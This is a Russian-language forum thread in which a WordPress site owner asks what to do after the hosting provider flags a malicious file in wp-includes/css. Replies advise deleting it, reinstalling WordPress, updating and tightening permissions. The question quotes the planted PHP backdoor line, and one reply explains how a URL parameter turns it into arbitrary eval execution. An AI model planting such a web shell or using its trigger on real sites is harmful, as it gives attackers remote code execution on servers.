На сайте wordpress обнаружен вирус хостингом public_html/wp-includes/css/customize-preview-rtl.min.php, что делать?

Question

[maratmd]

Всем привет, недавно на хостинге beget появилось сообщение, что обнаружен один вирус, по этому адресу сайт/public_html/wp-includes/css/customize-preview-rtl.min.php

и сточка показана

<?php @!!!>if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}if(isset($_REQUEST['startx'])){print "

Comments

[Дмитрий]

что делать?

Удалять вирус.

[d'Ivan]

slo_nik, поможет лишь на короткое время.
WordPress оказалась самой взламываемой CMS в 2018 году

[Alex]

Роман Мирр,

Согласно докладу, большинство случаев компрометации связаны не с уязвимостями в самих CMS, а с багами в различных темах и плагинах, некорректной конфигурацией и безалаберностью web-мастеров, нередко забывающих обновить программное обеспечение
Подробнее: https://www.securitylab.ru/news/498233.php

Проблема не в самой CMS, а в том, что она очень популярна и доступна, в том числе среди криворуких, малоопытных разработчиков

Answer 1

[Талян]

Ну и? Вам же показали строчку с вирусом. Удалите её, там eval() зашифрован просто.

Попал он туда через какую-то дыру в вордпрессе. Чтобы такого не было, постоянно обновляйте Wordpress.

Хакеры всегда будут искать новые дыры в массовых CMS, а производители софта постоянно их латать. Кто быстрее - тот и выиграл.

Comments

[maratmd]

полностью удалить строчку <?php @!!!>if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}if(isset($_REQUEST['startx'])){print "

[Талян]

maratmd, Ну если строчка вредоносная, что вы - часть оставить хотите?))
Конечно всю.

Если бы у вас были хотя бы начальные знания PHP, вы бы увидели, что
if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}

превращает адресную строку www.site.ru/?1=eval&2=phpinfo();

в PHP код:
eval("phpinfo();");

Имя функции eval и её аргумент можно менять как душе угодно.

[maratmd]

Анатолий, нашел файл только includes/css/customize-preview-rtl.min.css вместо php расширение css и там такого когда нет, только стили

[Талян]

maratmd, ну так вы это не мне пишите, а хостеру.
Может хостинг сам удалил этот файл когда нашёл вирус.

У моего товарища например когда хостинг нашёл такую строку в CMS ModX, он тупо снёс нафиг все файлы без бэкапа.

Answer 2

[Alex]

Полностью переустановите WordPress. Замените все его файлы кроме собственной темы и плагинов.

Answer 3

[Анатолий]

Взять и настроить свой VPS, Web-серверу дать права только на чтение, и забыть про эти проблемы. А удалив строку, завтра можно ждать новую )

Answer 4

[Пума Тайланд]

Лечить и искать откуда он взялся